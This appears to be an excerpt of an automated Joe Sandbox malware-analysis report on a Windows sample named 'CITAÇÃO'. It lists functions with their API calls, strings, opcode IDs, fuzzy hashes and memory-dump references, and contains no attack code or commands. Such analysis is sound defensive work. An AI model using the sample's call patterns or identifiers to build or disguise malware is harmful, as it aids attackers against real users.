                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                      • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                      • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                      • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                      Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$LabelVolume
                                                      • String ID: \VH
                                                      • API String ID: 2006950084-234962358
                                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                      Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                      • DrawMenuBar.USER32 ref: 00449761
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                      • String ID: 0
                                                      • API String ID: 772068139-4108050209
                                                      • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                      • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                      Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_wcscpy
                                                      • String ID: 3, 3, 8, 1
                                                      • API String ID: 3469035223-357260408
                                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                      Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                      • API String ID: 2574300362-3530519716
                                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                      Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                      • API String ID: 2574300362-275556492
                                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                      Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                      • API String ID: 2574300362-58917771
                                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                      Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                      Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                      • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                      • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                      • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                      Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                      • __itow.LIBCMT ref: 004699CD
                                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                      • __itow.LIBCMT ref: 00469A97
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                      Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                      Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                      Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                      Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                      Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
